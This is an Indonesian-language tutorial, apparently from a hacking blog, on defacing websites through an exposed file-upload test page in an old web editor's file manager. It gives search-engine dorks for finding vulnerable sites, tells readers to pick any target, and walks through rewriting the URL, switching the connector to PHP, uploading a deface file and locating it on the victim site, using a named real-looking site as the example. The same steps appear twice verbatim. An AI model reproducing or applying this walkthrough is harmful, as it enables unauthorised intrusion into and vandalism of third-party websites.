Teknik deface remote file upload vulnerability
DORK : inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"
1. copas salah satu dork diatas
2. Pilih salah satu web target
3. Kemudian Ganti Kode
editor/editor/filemanager/browser/mcpuk/images/icons/32/ menjadi editor/editor/filemanager/upload/test.html
4. contoh: www.tritor.com.br/editor/editor/filemanager/browser/mcpuk/ menjadi www.tritor.com.br/editor/editor/filemanager/upload/test.html
5. jika sudah masukk, ganti ASP menjadi PHP
6. pilih file deface sobat
6. pilih send to server
Jika berhasil nanti akan muncul Pesan jika file yang upload file with no error, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file sobat berada.
7. Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :http://www.tritor.com.br/editor/images/67124.html
DORK : inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"
1. copas salah satu dork diatas
2. Pilih salah satu web target
3. Kemudian Ganti Kode
editor/editor/filemanager/browser/mcpuk/images/icons/32/ menjadi editor/editor/filemanager/upload/test.html
4. contoh: www.tritor.com.br/editor/editor/filemanager/browser/mcpuk/ menjadi www.tritor.com.br/editor/editor/filemanager/upload/test.html
5. jika sudah masukk, ganti ASP menjadi PHP
6. pilih file deface sobat
6. pilih send to server
Jika berhasil nanti akan muncul Pesan jika file yang upload file with no error, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file sobat berada.
7. Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :http://www.tritor.com.br/editor/images/67124.html